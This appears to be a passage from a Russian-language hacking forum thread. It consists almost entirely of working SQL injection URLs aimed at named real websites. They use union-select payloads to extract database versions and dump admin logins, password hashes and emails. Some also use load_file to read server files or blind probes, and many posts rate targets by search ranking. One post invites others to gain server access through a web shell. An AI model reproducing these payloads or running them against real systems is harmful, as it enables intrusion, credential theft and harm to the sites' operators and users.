http://eros.rin.ru/cgi-bin/newsar.pl?id=-326868'+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5+--+ http://www.happydaysanimalrescue.org.uk/rescue-animals.php?id=-4'+union+select+1,2,3,4,5,6,7,group_concat(concat_ws(0x3a,username,password)),9,10,11+from+users+--+ http://www.mudracard.com/send-money.php?id=-5+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8++--+
Российский навигационный сервер Code: http://www.internavigation.ru/page.phtml?p=9%27+union+select+1,2,version(),4,5--+a в таблице users уж выведите сами
http://www.letterrep.com/index.php?wid=LTExOTcgdW5pb24gc2VsZWN0IDEsMiwzLDQsNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1LDE2LDE3LDE4LDE5LDIwLDIxLDIyLDIyLDIzLDI0LDI1LDI2LDI3LDI4LDI5LDMwLDMxLDMyLDMzLDM0LDM1LDM2LDM3LDM4LDM5LDQwLDQxLGNvbmNhdF93cygweDNhLHZlcnNpb24oKSx1c2VyKCksZGF0YWJhc2UoKSksNDMsNDQsNDUsNDUsNDYsNDcsNDgsNDksNTAsNTEtLSAK========== структура admin: admin_id admin_login admin_pwd admin_email admin_status admin_level amount
PHP: http://cosmetictrade.ru/proizv.php?id=12&id_cat=-18+union+select+1,concat_ws(0x03a,database(),version(),user())--
_ttp://www.filtron.pl/ru/index.php?idp=17+and+1=0+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15-- _)ttp://www.on33.ru/afisha/kino/?base=newssql0006&news=-1105+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14+from+information_schema.tables+limit+150,1+--+
kontrolnaja.ru 5.0.77 Яндекс тИЦ (CY) 90 +30 Google PageRank (PR) 3 intyoga.ru 5.0.37-standard-log borovskold.ru 5.1.61-0+squeeze1-log Яндекс тИЦ (CY) 10 Google PageRank (PR) 2 irkutsk.moilekar.ru Дальше свеб не пускает. 5.1.58-log Яндекс тИЦ (CY) 0 Google PageRank (PR) 1
http://irkutsk.moilekar.ru/article/?id=17%27+union+%0A+select+1,concat_ws(0x3a,login,password),3,4,5,6,7,8+from+users--+
PHP: http://mort.sto-helit.de/index.php?module=download&action=list&category=-13+union+select+user(),2,3,4,5,6,7+-- pr2 тиц10
http://www.movie-phil.de/movie.php?id=-124+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+ http://www.eventdirect.ca/game.php?ID=-62+union+select+1,2,3,4,concat_ws(0x3a,username,password),6,7,8,9,10+from+admin+--+ solgryn.org/product.php?id=-IWBTB'+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user(),database()),10,11+--+
PHP: http://www.cycletec.de/cms/index.php?page=-9+union+select+1,2,concat_ws(0x03a,id,user,password),4,5,6,7,8,9+from+cycletec.admin_users--
Так и не побежденный мною сайт. Как мы видим, File_Priv = Y, но магические кавычки = ON PHP: http://www.itradeindonesia.com/market_data.php?sub=-1+union+select+load_file(0x433a5c626f6f742e696e69)-- Благодаря специфичной реализации сайта, при которой скрипты, составляющие основу юзабилити сайта, как физически присутствуют на сервере в виде отдельных файлов, так и полностью записаны в базу данных, имеется возможность провести sql-инъекцию в сочетании с php-инклудом(я впервые встретил такой наглядный пример, ввиду своего небольшого опыта) PHP: http://www.itradeindonesia.com/market_data.php?sub=-1+union+select+0x2e2e2f2e2e2f696e646578-- Это именно то, о чем вы подумали, залитое через админку, и попавшее в БД. Проинклудить это мне не удалось. PHP: http://www.itradeindonesia.com/market_data.php?sub=-1+union+select+file_upload+from+ps_daily_stock+limit+60,60-- Саму админку, вы без проблем найдете по адресу PHP: http://www.itradeindonesia.com/admin.php P.S. Сайт является аналогом нашего ололо форекса(онлайн-трейдинг), правил раздела не нарушает, админ поставлен в известность, но пароли от админки как были прежними, так ими и остались, что символизирует. По традиции - если кто-то сможет получить доступ к серверу с помощью веб-шелла, дайте знать. Спасибо. (рад избавиться от этого сайта, стоящего мне бессоные сутки )
http://www.pereslavl.ru/news/world_news.cgi?show_news=-290840%20and%201=2%20union%20select%201,2,concat_ws(char(58),version(),user(),database(),@@version_compile_os),4,5,6,7+-- 5.0.22-Debian_2-log world_news@localhost world_news pc-linux-gnu
http://www.six-sigma.ru/index.php?id=140+and+1=2+union+select+1,+2,+3,+concat(email,':',pass),+5,+6,+7,+8,+9+from+mail
PHP: http://www.telecomsolutions.asia/productdetails.php?pid=-2489+union+select+1,2,3,4,5,6,7,concat_ws(0x03a,AdminId,Username,Password,Email,Status),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96+from+admin_users--
Code: http://www.usu.[COLOR=Green][SIZE=3][B][COLOR=Lime]edu[/COLOR][/B][/SIZE][/COLOR]/studemp/offcampus/showdetails.php?jobNum=-4326'+union+select+1,version(),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+ Database Version: 5.1.26-rc-community Database name: employment User name: [email protected]
ozdorov.com 10k users 5.1.49-rel11.3-log Яндекс тИЦ (CY) 10 Google PageRank (PR) prestig-tur.com.ua 5.5.20 Яндекс тИЦ (CY) 10 Google PageRank (PR) 2 continenttour.ru 5.0.26-log Яндекс тИЦ (CY) 30 Google PageRank (PR) 3 greatsteppe.kz http://www.greatsteppe.kz/admin/ Яндекс тИЦ (CY) 0 Google PageRank (PR) 1 l-art.ru 5.0.90-log Яндекс тИЦ (CY) 10 Google PageRank (PR) 2
PHP: http://www.space-travel.ru/resorts/14?res=-3+union+select+1,2,3,4,5,concat_ws(0x03a,id,login,password,salt,admin),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+ontravel_users+limit+0,1-- Админ уведомлен. P.S. По причине того, что я не смог получить plain их "соленыx" хешей
delinform.ru ТИЦ-230 blind Code: delinform.ru/tofirmcard.php?num=1004+and+4=substring(version(),1,1)/* uaq.org.ua ТИЦ-140 Code: www.uaq.org.ua/index.php?module=subjects&func=viewpage&pageid=-73+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17-- Code: 4.0.25-standard-log:[email protected]:quality_uaq farmfresh.org PR-5 Alexa-444k Code: http://www.farmfresh.org/about/news_details.php?news=-32+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5-- Code: 5.1.39-log:[email protected]:lgfoods
